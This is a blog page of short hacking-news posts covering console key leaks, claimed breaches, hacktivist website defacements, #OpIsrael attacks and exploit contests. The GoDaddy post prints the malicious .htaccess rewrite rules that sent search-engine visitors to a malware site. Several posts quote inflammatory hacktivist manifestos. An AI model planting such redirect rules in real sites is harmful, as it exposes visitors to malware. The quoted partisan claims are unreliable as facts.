Showing posts sorted by relevance for query hack. Sort by date Show all posts
Showing posts sorted by relevance for query hack. Sort by date Show all posts

Hack In Paris - International Security Conference

Posted by Avik Sarkar On 1/29/2012 07:13:00 pm

Hack In Paris - International Security Conference
Dear friends did you planned anything for this year summer? If not then we have suggestion for you and we hope you all will like that. From 18th-22nd June an International Security Conference will took place at Disneyland, Paris. Now we are sure that maximum of you will love to spend this summer in Paris. OK, now lets come to the point. Since 2004, an organization named Sysdream and HZV have been organizing an event named "Nuit du Hack" (Hacker’s Night) Paris & France. After the success of this year  with more than 950 attendees now the organizer has planned to setup  an international and corporate event named "Hack In Paris" while aiming to bring together security professionals  and enthusiasts. Hack In Paris will focus on the latest advances in IT security.
The conference will be held at Disneyland Paris Conference Centre from June 18th to 22th of 2012. This year always at Disneyland Paris, from 23 to 24 of June 2012 we will celebrate the 10 years of the Nuit du Hack. This place is easily accessible by train (15mn ride) from downtown Paris and airports.

Topics:-
  • The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here.
  • Advances in reverse engineering
  • Vulnerability research and exploitation
  • Penetration testing and security assessment
  • Malware analysis and new trends in malicous codes
  • Forensics, IT crime & law enforcement
  • Privacy issues: LOPPSI, HADOPI, ...
  • Low-level hacking (console security & mobile devices)
  • Risk management and ISO 27001

For more information click Here


-Source (Hack In Paris)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Unpatchable Security Hole in PlayStation 3 Leading The "final hack" Also LV0 Cryptographic Keys Revealed

Posted by Avik Sarkar On 10/26/2012 05:59:00 am

Unpatchable Security Hole in PlayStation 3 Leading The "final hack" Also LV0 Cryptographic Keys Revealed

We all are very much aware that Sony along with its product's were always been a very hot favorite target of hackers. But here there are few twists, so the word 'Hack' will be be the appropriate one to describe of what happened to Sony. According to a report on Eurogamer Sony's PlayStation 3 is facing a new security threat - one it hasn't seen since the system was cracked via the PSJailbreak in 2011. The PS3 has been hacked before, but Sony was able to inhibit the hack with an update to its own firmware. This is much like the history of jailbreaking on Apple's iOS. But the latest PS3 break is being dubbed unpatchable and the final hack. That's because this hack isn't giving you an exploit to use against a programming hole. It's giving you Sony's so-called LV0 (level zero) cryptographic keys
A decryption key that is reported to be circulating on the net is said to remove the final protective barrier on some models of Sony's PlayStation 3 consoles. In the long run, the release of the key will probably allow unsigned software such as homebrew games, Linux distributions, or pirate copies of software to run on some PS3 consoles. Allegedly, the private key can be used to modify and sign the "LV0" (Level 0), for example to disable its security checks. When the PS3 system boots, from version 3.60 of the PS3's firmware, the LV0 is directly launched by the bootloader (bootldr) that is built into the system's hardware – which means that the chain of trust is broken at a very early stage. As Sony won't be able to update the bootloader with a software update, the hacker community considers this the "final hack" of the PS3 in its current forms. Eurogamer says that these keys may not have been released at all if not for a Chinese hacking outfit called "BlueDiskCFW," who gained access to the keys and planned to charge for new custom firmware updates it would create. The original group that created the LV0 had no plans on releasing them, but eventually they were leaked onto the Internet in some limited fashion. Seeing that someone was going to profit on them, the group known as "The Three Tuskateers" decided to release them into the wilds of the Internet. 
In a statement the hacker group says that "You can be sure that if it wouldn't have been for this leak, this key would never have seen the light of day, only the fear of our work being used by others to make money out of it has forced us to release this now," 





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Flicker Is Developing Their New Tool For Photo Hack Day

Posted by Avik Sarkar On 8/21/2011 07:43:00 pm


Just in time for the August 20-21 Photo Hack Day, Flickr has unleashed some new tools for providing real-time photo data to web apps.That means you can soon look forward to apps that make more extensive — and immediate — use of what’s going on in your Flickr photo stream and those of your friends.
Back in June, the photo-sharing service allowed developers to access photos and favorites from a user’s contacts in their applications using some of Flickr’s nifty PuSH API methods.
As Flickr’s “nils” noted in the Flickr developer blog, those methods were “pretty neat, but that barely scratches the surface of stuff that happens on Flickr that people might be interested in. So we added some more stuff to subscribe to.”
The new APIs make use of Pubsubhubbub (for instant notifications when something is published — say, a new photo) and allow developers to grab a lot more interesting data for their users, including:

    Photos of you
    Photos of your contacts
    Your photos and favorites
    Photos from a specific area (using geodata)
    Photos with a certain tag or tags
    Images from the Flickr Commons
    And, of course, photos and favorites from your contacts

When grabbing photos from the Commons, you can specify a particular institution or institutions to pull from — for example, you could just get pics from the Smithsonian and the White House. Or, you could scrape all photos and updates from the Flickr Commons in real time.
As for geodata, you can specify an area using a point and radius or a set of WOE IDs, the subscribe to images from that area. This would be handy for getting a real-time stream of photos of tourists “holding up” the Leaning Tower of Pisa, to name a terrible example that should never be implemented by anyone.
Etsy developer Kellan Elliot-McCrea was kind enough to post about how to get started with the new APIs, including some lovely PHP snippets.
Flickr will be at Photo Hack Day (or, more accurately, Photo Hack Weekend) in New York City this weekend. Flickr dev Paul Mison will be on hand to talk about the Flickr APIs and answer questions.

For More Information about Photo Hack Day click Here

-News Surce (Dev Beat & Photo Hack Day)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

PSN Hacked Again By Anonymous! 10 Million Users Affected [Sony Denis The Hack]

Posted by Avik Sarkar On 8/16/2012 05:46:00 am

PSN Hacked Again By Anonymous! 10 Million Users Affected [Sony Denis The Hack]

Oh! no again Sony Play Station Network faced cyber attack. Guess who was behind this??? Yes this time also hacker collective Anonymous have breached the PSN and stolen more than ten million account details (Email-id & encrypted passwords). Anonymous announced the hack on its Twitter account on Wednesday (though that tweet has since been removed). 

That tweet has claimed that yet again Anonymous have broken into PlayStation Network and has a 50 gigabyte database of email accounts and their passwords – this would put more than ten million accounts at risk. This would be a huge blow to Sony if Anonymous has in fact completed a successful PSN hack and PlayStation Network breach. If PSN has been breached millions of users personal information, including credit cards, would be in the hands of potentially malicious users.
However note that Sony completely denies the hack. The official twitter account of PSN says- "We can confirm that the recent claim that PSN was illegally hacked & that customer PWs and email addresses were accessed is completely false".

According to Kotaku reports that the list in the Pastebin doc is a copy of a seemingly unrelated list of email addresses from March 2012, called "Email accs! // universe security sucks." The PSN hack, in other words, appears to be a rumor that didn't turn out to be true.But still we have to wait for Sony's official response about the whole matter. 
Since last year the battle between hacktivist Anonymous, Lulzsec and Sony is running. Hackers have penetrated Sony's PSN network and stolen millions of user personal information. Later Sony was forced to shutdown its entire network & apologized for the whole massacre. Not only PSN, also Sony Online Entertainment, Sony Pictures, Several Sony's official website from different countries fallen victim to the hackers. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

HP Training Center Official Website Hacked & Defaced

Posted by Avik Sarkar On 8/12/2012 11:40:00 pm

HP Training Center Official Website Hacked & Defaced 
Official website of Hewlett Packard Training center also known as HP training center get hacked. Here again well-known Pakistani hacker known to as 'Hitcher' from a hacker collective group named Pak Cyber Force (PCF) took responsibility of this hack. His last hack take down the official website of NIOS, and here also he followed the same mechanism & that is in-spite of having full privilege on the HP server, the hacker did not harm the main index. He just uploaded his deface page as shown in the above picture. This hack also compromised three sub-domain of HP among them there are Designjet - Sales Training and Development Center, HP Indigo Training Center & one more. As expected Hitcher has also created deface mirror on Zone-HackThis cyber attack took place yesterday & still the deface page uploaded by the hacker exist on the web-server. Such kind of carelessness or irresponsibility is not at all expected from a company like HP. Hitcher is widely known for defacing high profile websites, his last few high profile hack was Bank of Punjab, Kingfisher AirlinesCentral Statistical Agency of Ethiopia & 100+ Chinese Govt Websites. The hacker's message on the deface page is clearly indicating that the hack was motivated due the cause of Palestine. Though it is not clear that why he targeted HP, because there is no relation between HP and the inhuman torture in Palestine. 

Message of the Hacker:- 
"Free Palestine . . . We will not go down..Freedom is our goal. .// End the Occupation. . . . .
You the Zionist Government of Israel have been murdering thousands and thousands of innocent Palestinian people for years and enough is enough! The land you call Israel is occupied illegally and is not and will never be yours and the fight to free the Palestinian people and their land from your evil clutches will continue! You continue to try and play the victim in all this bloodshed, yet we have all seen and know you are the murderers, suppressors, rapists and terrorists in this bloody war!
You have NO Israeli culture, NO history in Gaza, nor in the West Bank or in Great Palestine. The only history you the Zionist Terrorist Israel are leaving for your future children is of BLOODSHED, TEARS and LOSS OF LIFE and that is not something to be proud of. To call the land you illegally occupy "Israel" is not only misguided, it is tragic and leaves a very foul taste in the mouths of millions of people who stand against you.
Israel your idea of the peace process is surrender or war and we will not surrender! This is not a war against race, religion nor sex, but a fight against the suppression, murders, and rapes of millions of Palestinians that occurs on a daily basis by you the Zionists. 
To the people of Palestine we have not forgotten you, nor will we ever forget you and as long as we are still breathing we will continue to grow stronger and will fight for your freedom!
LONG LIVE PALESTINE.."




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Facebook Denies The Hack-Activity Of Team Swastika

Posted by Avik Sarkar On 10/19/2011 06:16:00 pm


We are aware of that Recently Formed Hacking Crew From Nepal called "TeamSwaStika"  hacked more than 10 thousand facebook account. TeamSwaStika have posted those hacked account on pastebin openly. later it was removed for violation. Also they have reported their hack to VOGH. If you dig some statistic then you will find that it is one of the biggest attacks on Facebook users. Because TeamSwaStika has grabbed more than 10K log-in details of Facebook users. 
But Facebook completely denies this hack activity and said Team Swastika's supposed hack of account logins was no hack at all. Facebook looked into the issue and said the details did not relate to any active accounts. "This does not represent a hack of Facebook or anyone’s Facebook profiles," a Facebook spokesperson said.
"Our security experts have reviewed this data and found it to be a set of e-mail and password combinations that are not associated with any live Facebook accounts." 
Facebook said Trend Micro's use of the term "hacked" was "simply wrong." Ferguson never indicated Facebook itself had been hacked, however, and the social network said the data had been taken in a phishing attack.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Israel Ministry of Finance Unit (Lehava) Hacked By Hitcher

Posted by Avik Sarkar On 6/28/2012 02:46:00 am

Israel Ministry of Finance Unit (Lehava) Hacked By Hitcher To Protest Against Mr.Badoo's Arrest By FBI

The official website of Governament of Israel's Ministry of Finance Unit (Lehava) get hacked. According to sources a Well-known Pakistani hacker code named Hitcher from a hacker collective group Pak Cyber Force (PCF) was behind this attack. Though the hacker did not change the index page but he managed to gain access on the Lehava's web-server and uploaded his page which is clearly showing the reason of this hack. The hacker has also created a deface mirror on Zone-Hack. We also like to give you reminder that earlier in this year Hitcher also hacked Amitec- one of the top IT innovative company of Israel

Message of the Hacker:- 

"Site is Defaced In Protest of Ali Hassan aka Mr.Badoo Arrested By FBI 
His Chargers was hacking into PC of Andy who create any event of drawing Prophet Muhammad’s(SAW).
He hacked Andy account and remove that event from facebook
His Protest of Hack was Postive Just to Stop That events and His Message was clear That Respect each other and Each other Religion Too He neither Public Andy Data and personal info ..."

Hitcher also vows to engage more cyber attack while saying "This Hack is just A Protest We want Him Free, and Its Just a trailer..". Hitcher is widely known for defacing high profile websites, Here I am mentioning a few of  his activities & high profile hack wasOfficial website of one of KingFisher Airline, United Bank of IndiaIDBI PaisabuilderCentral Statistical Agency of Ethiopia & 100+ Chinese Govt Websites & many more. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

25 Years Old Guy Busted While Attempting to Hack Facebook Server

Posted by Avik Sarkar On 8/20/2011 04:42:00 pm

A  25 year old Brit allegedly used "considerable technical expertise" to hack into Facebook's servers.
Student Glenn Steven Mangham from York is currently on trial at Westminster magistrates' court for five charges under the Computer Misuse Act including adapting, supplying or offering to supply  software that ensures users can hack into Facebook's servers.

Mangham was arrested by the Metropolitan Police's Central e-Crime Unit in June this year for "computer hacking offences".
It is alleged that that between April 27 and May 9, Mangham hacked into a Facebook puzzle server that allows developers to test their skills, several times. Furthermore, it is also alleged he attempted to hack into a Facebook mailman server run that manages email distribution lists, as well as trying to gain access to the Facebook phabricator server, which offers tools for third-party app developers.
"This is what can be described as a hacking case," lawyer for the prosecution, Matthew McCabe, said.
While on bail, Mangham has been barred from accessing the web from any device.

"The court feels it will be safer if there was no access to the internet which will reduce the temptation for your son to go on to Facebook," said Judge Nicholas Evans, who is preceding over the case.

Facebook said no personal details had been compromised during the attempted hacks and the social network had been working with Scotland Yard and the FBI as they "take any attempt to hack our internal systems extremely seriously".
According to a news daily "this is one of the first investigations into a hacking attempt on the social network and detectives were not aware of any hacking attempts "to this extent".

-News Source (Pc Advisor)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware

Posted by Avik Sarkar On 9/25/2011 08:52:00 pm


Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 
Code:-
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 
Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Posted by Avik Sarkar On 4/07/2013 05:20:00 pm

Muslim Liberation Army (MLA) & Kosova Hacker Security (KHS) Joins Operation Isreal & Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Operation Israel the devastating hacking rampage continues and becoming more and more venturesome for the Israeli cyber space. In the last week of March, it was dangerous hacker collective group Anonymous who called the operation also dubbed #OpIsrael, where the hacker group vows to erase Israel from the Internet. And as expected this is happening, the first quake came from Turkey-based Marxist hacker group named RedHack and Anonymous, where they targeted Israeli intelligence agency Mossad and breached personal data of 35K officials. Operation Israel, was not among those typical rampage of Anonymous, here Anon called other hackers from different part of of the spectrum to join. First it was RedHack who responded, and now the Muslim Liberation Army lead by Pakistani hacker Hitcher, along with Kosova Hacker's Security & few other Albanian hacker's community joined #OpIsrael
Yesterday it was Hitcher from Muslim Liberation Army (MLA) who targeted Israel’s Ministry of National Infrastructures (MNI). The hacker managed to breach the server of Israel Ministry and defaced several website belongs to Israel Ministry of Infrastructures. The attack took place at yesterday late night, but still at the time of writing the news, several Israel MNI websites are not performing. Not only MNI, as per sources several other high profile and Israeli government sites have also been taken down in this round attack. While covering this hack of Hitcher, we must have to recap the previous hack of  Pakistan hackers who are constantly against Israel (for Gaza issue) causing massive cyber attack against leading IT industry of Israel and other high profile Israeli sites. Just a couple of months ago, the world seen what it call the black day in the history if Israeli cyber space where another Pak hackers community hacked the main domain controller of Israel, which causes a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Colla, XBOX, Windows, Intel & many more. 


During the hacking rampage, Hitcher delivered the following message - 
“We are outraged at the Palestine present condition and the Illegal occupation of Palestinian Land By the Zionist Israelis. This attack is in response to the Injustice against the Palestinian people. Occupied Palestinian land under the guise of residential settlements are being increased. Palestinians are deprived of their basic human rights. International Aid workers are stopped from providing any humanitarian assistance to the people. The International community and media is not allowed to bring facts to world as due to strict restrictions” 

On the other hand, Kosova Hacker's Security along with few other Albanian hacker's community performed, what it called a demolishing cyber attack, that caused huge damage to the Israeli cyber space. During the attack Kosova Hacker's Security also known as KHS hit several important Israeli government & commercial websites such as  Civil Aviation Authority, Israel Police, Ministry of Health and many more. KHS caused damage to those websites, not by doing defacement by causing data leak. KHS hacked and exposed thousands of sensitive data, including full name, email-id, passwords and other confidential information of those said Israeli websites. All those leaked data have been made available by the hackers in a website called pentagoncrew.com All those hacks have been performed under the banner of Operation Israel also dubbed #OpIsrael for the cause of GazaFor instance, here we can recap the hack of Kosova Hackers Security (KHS) where they hacked and exposed personal data of 35,000 Israeli people. 

At conclusion, we want to say that, at the time when Anonymous first called Operation IsraelIsraeli government presumed that they have taken the threat very seriously and from the government end it has been  stated that they will take almost every steps to avoid any kind of disaster. Now after observing the above scenario it is clear that Israel Government have completely failed to protect their cyber space, in spite of having precaution. Also another thing get spot light, that is different hackers community have already came under a single shade in order to hit Israel against Gaza & Palestine issue. Today is the historical 7th April, I mean the day which Anonymous promised to erase Israel from the Internet. So the clock is running, lets see what more is about to come.  for the time stay tuned with VOGH to get all the latest update on this story and also other cyber issues. 







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Bangladeshi Prime Minister's Email-id Hacked By Teamgreyhat

Posted by Avik Sarkar On 4/02/2012 04:04:00 am

Bangladeshi Prime Minister's Email-id Hacked By Teamgreyhat 

After remaining silent for a certain time hacktivist group Teamgreyhat strikes again. The past records says this hacker group is know for hacking large number of sites but this time they did some thing different. Here the target was Sheikh Hasina, Prime Minister of Bangladesh. Teamgreyhat took responsibility for hacking into the official Email-id of Bangladesh PM (pm@pmo.gov.bd). Also they have claimed to have access to rest of other 73 email-id's of Bangladesh Prime Minister Office. Teamgreyhat have submitted the following screen shots- 

The above screen shots ware taken during the hack (submitted by TGH), which is clearly indicating that the hacker group has successfully breached the Web-mail of Bangladesh Prime Minister office and exported all the emails from the pm@pmo.gov.bd. Due to security issue we are not publishing the password of that above mail id. Earlier this group has taken a major role in the past cyber-war between India & Bangladesh while hacking into Bangladeshi Stock Market, Islami Bank Ltd Bangladesh and few other high profile website of BD. We want to give you reminder that in the time of Islami Bank hacking TGH claimed that they have breached the BD Prime Minister Office(PMO) & BD Parliament Network and gained more than 40 GB sensitive data of BD govt. So it can be expected that time they have stolen the passwords of BD PM. Though Teamgreyhat did not specify the reason of this hack.
Few months ago we have seen such similar hack, that time the victim was Syrian President Bashar Assad. Hacker group Anonymous take responsibility of that hack. After exposing the hacked mails we have also seen that many untold histories came from that which could even lead a modern warfare. Now same things repeated by TGH, so lets see what we will get in future.....




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Massive Phishing Scheme Originating from China, said Google

Posted by Avik Sarkar On 6/02/2011 03:45:00 am


Hundreds of personal Gmail accounts, including those of some senior U.S. government officials, were hacked as a result of a massive phishing scheme originating from China, Google said Wednesday.The account hijackings were a result of stolen passwords, likely by malware installed on victims' computers or through victims' responses to e-mails from malicious hackers posing as trusted sources. That type of hack is known as phishing. Gmail's security systems themselves were not compromised, Google said.The company believes the phishing attack emanated from Jinan, China. In addition to the U.S. government personnel, other targets included South Korean government officials and federal workers of several other Asian countries, Chinese political activists, military personnel and journalists. The news comes a little more than a year after a separate hack originating from China affected Gmail accounts of Chinese human rights activists. In that case, attackers were able to break through Google's security systems, and two Gmail accounts were hacked.
That cyber attack set off a series of events that eventually led to Google ending its agreement with the Chinese government to censor certain search results, and the company physically moved its servers out of the country.
This time around, the hack appears larger in scope -- but Google itself was not attacked. A person with knowledge of the attack's details said there was no apparent correlation between last year's attack and this one.
A spokesman from Google declined to comment on how the company obtained the information about the most recent hack. Public information, user reports and a third-party hacking blog called Contagio was used to determine the scope, targets and source of the attack.Google (GOOG, Fortune 500) said it notified the victims and disrupted the campaign. The hackers were attempting to monitor the victims' e-mails, and some users' forwarding settings were altered.The company urged users to "please spend ten minutes today taking steps to improve your online security so that you can experience all that the Internet offers -- while also protecting your data." Google provided several examples of how Gmail users can better protect themselves from phishing attacks on its blog, including enabling a setting that allows users to login to their accounts only after receiving a verification code on their phones. The company also suggested that users monitor their settings for suspicious forwarding settings.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

After Google Chrome Hack Sergey Glazunov Earnd $60,000 At Pwnium Contest

Posted by Avik Sarkar On 3/10/2012 10:12:00 pm

Sergey Glazunov, A Security Researcher Earn $60,000 At Pwnium After Google Chrome Hack

Sergey Glazunov, a Russian security researcher has earned $60,000 by demonstrating how he could waltz past the security sandbox in Google's Chrome browser to run unauthorized code on fully-patched Windows 7 computers. Glazunov discovered a remote code execution vulnerability in Chrome, that could be used by malicious hackers and cyber criminals to install and run code on innocent users' computers, just by them visiting a website. Glazunov, who is no stranger to reporting bugs in Chrome, won his substantial reward as part of the Pwnium competition run by Google at the CanSecWest conference in downtown Vancouver.
Senior Vice President of Google Chrome and Apps, Sundar Pichai, confirmed the successful hack on his Google+ page. Now that the hack is known throughout the developer world, Pichai understandably said, “Congrats to long-time Chromium contributor Sergey Glazunov who just submitted our first Pwnium entry. Looks like it qualifies as a “Full Chrome” exploit, qualifying for a $60k reward. We’re working fast on a fix that we’ll push via auto-update. This is exciting; we launched Pwnium this year to encourage the security community to submit exploits for us to help make the web safer. We look forward to any additional submissions to make Chrome even stronger for our users.”



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

The Stratfor Hack Was Not The Work Of Anonymous

Posted by Avik Sarkar On 12/27/2011 10:16:00 pm


Yesterday we have covered a story which was saying that U.S. Security Think Tank Stratfor was hacked by Anonymous. Later Anon authority completely denied this hack. In the official press release anon clearly said that Stratfor is an open source intelligence agency, publishing daily reports on data collected from the open internet. Hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda, and some Anons have taken the bait. They have also confirmed that the hackers - who may be linked to Sabu of LulzSec fame - managed to steal Stratfor's confidential client list and mined over 4,000 credit card numbers, passwords and home addresses.

Press Release of Anonymous:- 
"Emergency Christmas Anonymous Press Release
-------------------------------------------
12/25/2011


THE STRATFOR HACK IS NOT THE WORK OF ANONYMOUS


Stratfor is an open source intelligence agency, publishing daily reports on data collected from the open internet. Hackers claiming to be Anonymous have distorted this truth in order to further their hidden agenda, and some Anons have taken the bait.


The leaked client list represents subscribers to a daily publication which is the primary service of Stratfor. Stratfor analysts are widely considered to be extremely unbiased. Anonymous does not attack media sources. In this excerpt from Time, there is a brief description of how Stratfor analysts uncovered a possible US backed coup in Iraq preceding the US invasion.


"In the past month Stratfor has drawn attention to a carefully assembled open-source report that asserted that last month's attack on Iraq wasn't intended just to punish Saddam Hussein for blowing off U.N. weapons inspectors. By sorting through thousands of pieces of publicly available data--from Middle East newspapers to Iraqi-dissident news--Stratfor analysts developed a theory that the attacks were actually designed to mask a failed U.S.-backed coup. In two striking, contrarian intelligence briefs released on the Internet on Jan. 5 and Jan. 6, Stratfor argued that Saddam's lightning restructuring of the Iraqi military, followed by executions of the army's Third Corps commanders, was evidence that the coup had been suppressed. Predictably, U.S. officials said the report was wrong."


Stratfor has been purposefully misrepresented by these so-called Anons and portrayed in false light as a company which engages in activity similar to HBGary. Sabu and his crew are nothing more than opportunistic attention whores who are possibly agent provocateurs. As a media source, Stratfor's work is protected by the freedom of press, a principle which Anonymous values greatly.


This hack is most definitely not the work of Anonymous.


We are Anonymous
We do not forgive
We do not forget
Expect us..."





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Two Romanian Hackers Pleaded Guilty on Credit Card Hack & Faced 7 Years Imprisonment

Posted by Avik Sarkar On 9/20/2012 03:43:00 pm

Two Romanian Hackers Pleaded Guilty on Credit Card Hack & Faced 7 Years Imprisonment  

According to the U.S. Department of Justice two Romanian hacker- Iulian Dolan & Cezar Butu have pleaded guilty to participating in a US$10 million scheme to hack into the computers of hundreds of Subway restaurants in the U.S. and steal payment card data. Iulian Dolan, 28, of Craiova, Romania, pleaded guilty Monday to one count of conspiracy to commit computer fraud and two counts of conspiracy to commit access device fraud, and Cezar Butu, 27, of Ploiesti, Romania, pleaded guilty to one count of conspiracy to commit access device fraud, the DOJ confirmed. Dolan and Butu were two of four Romanians charged in December in U.S. District Court for the District of New Hampshire with hacking Subway point-of-sale computers. In his plea agreement, Dolan has agreed to be sentenced to seven years, and Butu has agreed to be sentenced to 21 months in prison. The two men, in their guilty pleas, acknowledged participating in a Romanian-based conspiracy, lasting from 2009 to 2011, to hack into hundreds of U.S. point-of-sale (POS) computers. Co-conspirator Adrian-Tiberiu Oprea is in U.S. custody and awaiting trial in New Hampshire. The group used stolen payment card data to make unauthorized charges or to transfer funds from the cardholders' accounts, the scheme involved more than 146,000 compromised payment cards and more than $10 million in losses.  
During the conspiracy, Dolan remotely scanned the Internet to identify vulnerable POS systems in the U.S. with certain remote desktop software applications (RDAs) installed on them. Using these RDAs, Dolan logged onto the targeted POS systems over the Internet. The systems were often password-protected and Dolan attempted to crack the passwords to gain administrative access. 
He then installed keystroke logging software onto the POS systems and recorded all of the data that was keyed into or swiped through the POS systems, including customers' payment card data. Thus Dolan managed to steal payment card data belonging to approximately 6,000 cardholders. Dolan received $5,000 to $7,500 in cash and personal property from Oprea for his efforts.
In his plea agreement, Butu said he repeatedly asked Oprea to provide him with stolen payment card data and that Oprea provided him with instructions for how to access the website where Oprea had stored a portion of the stolen payment card data. Butu later attempted to use the stolen payment card data to make unauthorized charges on, or transfers of funds from, the accounts. He also attempted to sell, or otherwise transfer, the stolen payment card data to other co-conspirators. Butu acquired stolen payment card data from Oprea belonging to approximately 140 cardholders
While talking about Romanian Hackers then one name definitely comes in mind and that is Razvan Manole Cernaianu aka "TinKode" who get busted earlier in this year, on charges of hacking into Pentagon and NASA servers, stealing confidential data. Also last year another 26 year aged Romanian hacker faced imprisonment for hacking into NASA servers. 


-Source (CSO)





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Department of Homeland Security & U.S. Navy Hires Company To Hack Into Video Game Consoles

Posted by Avik Sarkar On 4/07/2012 10:01:00 pm

Department of Homeland Security & U.S. Navy Hires Company To Hack Into Video Game Consoles 

The U.S. government has hired a California-based company to hack into video game consoles, such as Xbox 360 and PlayStation 3, to watch criminals, especially child predators, and learn how to collect evidence against them. The $177,000 contract with Obscure Technologies of San Rafael, Calif., is being executed by the U.S. Navy on behalf of the Department of Homeland Security because of the Navy’s expertise in the field, officials said. Under the contract, Obscure Technologies will purchase used gaming systems from abroad that are believed to hold “sensitive information from previous users” and try to hack into them. Obscure’s experts will then report back on how they gained access to the systems, provide instructions to obtain users’ chat room activity, and even report back on the data gleaned, according to the contract and tasking documents. Obscure will also purchase new systems and construct a device that can capture data and activity, the documents state.
Over the past few decades, video game systems have grown in sophistication and capabilities by leaps and bounds. Consoles like the Nintendo Wii, Sony PlayStation 3, and Microsoft Xbox can be found in many U.S. households and are popular among servicemembers, with Internet access and hard drives that rival personal computers.
With these advances, Garfinkel said, the systems have become a playground of illegal activity for criminals. In 2008, law enforcement agencies contacted the DHS’s Science and Technology Directorate and requested help in analyzing gaming systems seized during court-authorized searches, Garfinkel said. While some tools exist to extract data from gaming consoles, the consoles are hard to crack as they are designed with copyright protection systems, he said. Navy and DHS officials declined to comment on whether the gaming consoles of Americans will ever be hacked and monitored. They also declined to comment as to whether the system manufacturers had been approached about this research.


-Source (Stars & Stripes)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

JailbreakMe Security Flaws Will be Patched by Apple

Posted by Avik Sarkar On 7/10/2011 03:10:00 pm


Shortly after the JailbreakMe hack that uses Mobile Safari to jailbreak iPhones, iPads and the iPod touch hit the Web, Apple announced that it will be patching the potential security flaw the hack takes advantage of, according to Yahoo! Finance
Jailbreaking is a process that hacks iOS so third-party apps that aren’t available through Apple’s iTunes-based App Store can be installed. Unlike other jailbreak tools, JailbreakMe doesn’t require a computer to handle the hacking process. Instead, users only need to go to the JailbreakMe Web site on their iPhone, iPod touch or iPad, and the security flaw the hack takes advantage of is exactly what Apple plans to patch. 
While patching the flaw will take away the ease of use that JailbreakMe offers, it will also block a security flaw that could potentially be used for more nefarious deeds. The flaw takes uses specially crafted PDF documents to install software on user’s iOS devices, potentially without their permission or knowledge. So far, there aren’t any reports of malicious uses of the flaw, only the JailbreakMe hack.
Bethan Lloyd, a spokesperson for Apple, said the company is “aware of this reported issue and developing a fix that will be available to customers in an upcoming software update.” There isn’t any word yet on when to expect the security update to be released

-News Source (Mac observer)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

iPhone 4S Hacked By Dutch Researchers During Pwn2Own Contest

Posted by Avik Sarkar On 9/20/2012 05:40:00 pm

iPhone 4S Hacked By Dutch Researchers During Pwn2Own Contest & Won $30,000 Prize
 

So called fully patched and secured iPhone 4S have fall into victim in-front of hackers. Two Dutch clever minds during a Pwn2Own contest were able to hack a fully patched iPhone 4S to gain a slew of information from the device. The hackers, Joost Pol and Daan Keuper, were able to find vulnerability in WebKit that allowed them to hi-jack photos, videos, address book contacts, and browsing history right from the phone. The two earned a $30,000 cash-prize for performing what they call “a clean hack.” 

That was the intellectual challenge that drove a pair of Dutch researchers to start looking for an exploitable software vulnerability that would allow them to hijack the address book, photos, videos and browsing history from a fully patched iPhone 4S. 
